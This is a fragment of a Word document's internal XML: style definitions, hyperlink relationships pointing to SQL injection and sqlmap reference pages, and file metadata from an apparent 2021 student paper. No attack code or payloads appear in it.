  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="60"/>
      <w:ind w:left="718" w:right="619"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="940" w:hanging="270"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="38"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000A30DB"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000A30DB"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="000A30DB"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:lang w:val="sq-AL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EF2D7F"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00EF2D7F"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:lang w:val="sq-AL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EF2D7F"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00EF2D7F"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:lang w:val="sq-AL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002C682F"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="sq-AL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="002C682F"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:lang w:val="sq-AL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004B1B50"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D431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4310B"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000E6107"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F497D" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BF6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462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beaglesecurity.com/blog/vulnerability/boolean-based-blind-sql-injection.htm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portswigger.net/web-security/sql-injectio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sqlmap.or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yperlink" Target="https://tools.kali.org/vulnerability-analysis/sqlmap" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:leand.thaci@student.uni-pr.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954F3-BCEA-4817-9BCF-5DAD85002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27</Pages>
  <Words>4274</Words>
  <Characters>24363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Leand Thaqi</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-21T23:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-26T15:11:00Z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2021-12-21T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>